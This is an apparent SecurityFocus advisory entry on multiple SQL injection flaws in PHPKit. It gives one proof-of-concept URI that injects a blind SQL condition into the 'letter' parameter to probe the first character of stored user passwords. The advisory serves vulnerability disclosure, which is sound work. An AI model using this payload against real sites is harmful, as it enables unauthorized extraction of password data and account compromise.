info
discussion
exploit
solution
references
PHPKit Multiple SQL Injection Vulnerabilities
No exploit is required.
A proof of concept URI is available:
http://www.example.com/phpkit/include.php?path=login/member.php&letter=phuket'%20AND%20MID(user_pw,1,1)='8'/*
Privacy Statement
Copyright 2010, SecurityFocus
